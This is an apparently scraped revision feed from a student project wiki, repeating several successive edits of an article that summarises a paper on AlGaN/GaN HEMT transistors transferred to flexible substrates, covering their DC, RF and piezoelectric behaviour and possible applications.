&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics PCB more light, more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent). In a compact package, this is a good solution to match space and complexity (a lot of wires or circuits with a small space can be possible now with flexible circuits).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make flexible LED (flexible OLED for flexible Organic LED) in order to make LCD flexible screen, as thin as a paper&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping solar cells. You can developp solar cells with flexible circuits.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32117</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32117"/>
				<updated>2016-06-14T14:37:27Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt;&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do electronics PCB more light, more flexible, with the same RF and DC performances than a PCB with classic transistors. The flexible substrate provides to the PCB RF and DC performances when it is strained (flat or bent).&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. We are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
For example, in LCD fabrication, glass is used as substrate. Now, with flexible substrate, we are able to make LCD flexible screens.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another example is for developping solar cells. You can developp solar cells with flexible circuits.&amp;lt;br /&amp;gt;&lt;br /&gt;
You can also use flexible circuits when you develop a compact package. This is a good solution to match space and complexity (a lot of wires or circuits with a small space can be possible now with flexible circuits).&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32033</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32033"/>
				<updated>2016-06-13T11:37:44Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and how fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, with the same RF and DC performances than a RFID with classic transistors. The flexible substrate provides to the RFID RF and DC performances when it is strained (flat or bent). With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt; when it is stained&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
We can also continue to use transistor in a normal PCB. The flexible substrate provide to the manufacturer a low cost solution to have transistor with the same performances.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32032</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32032"/>
				<updated>2016-06-13T11:35:46Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, with the same RF and DC performances than a RFID with classic transistors. The flexible substrate provides to the RFID RF and DC performances when it is strained (flat or bent). With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt; when it is stained&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
We can also continue to use transistor in a normal PCB. The flexible substrate provide to the manufacturer a low cost solution to have transistor with the same performances.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32031</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32031"/>
				<updated>2016-06-13T11:32:55Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, and also more performant. In fact, the RF characteristics globally still the same, and the performance in terms of strain (flat or bent) still also the same. With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
We can also continue to use transistor in a normal PCB. The flexible substrate provide to the manufacturer a low cost solution to have transistor with the same performances.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32030</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32030"/>
				<updated>2016-06-13T11:32:36Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
&amp;lt;p&amp;gt; With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, and also more performant. In fact, the RF characteristics globally still the same, and the performance in terms of strain (flat or bent) still also the same. With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
We can also continue to use transistor in a normal PCB. The flexible substrate provide to the manufacturer a low cost solution to have transistor with the same performances.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&amp;lt;/p&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32029</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32029"/>
				<updated>2016-06-13T11:30:25Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Main contribution */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
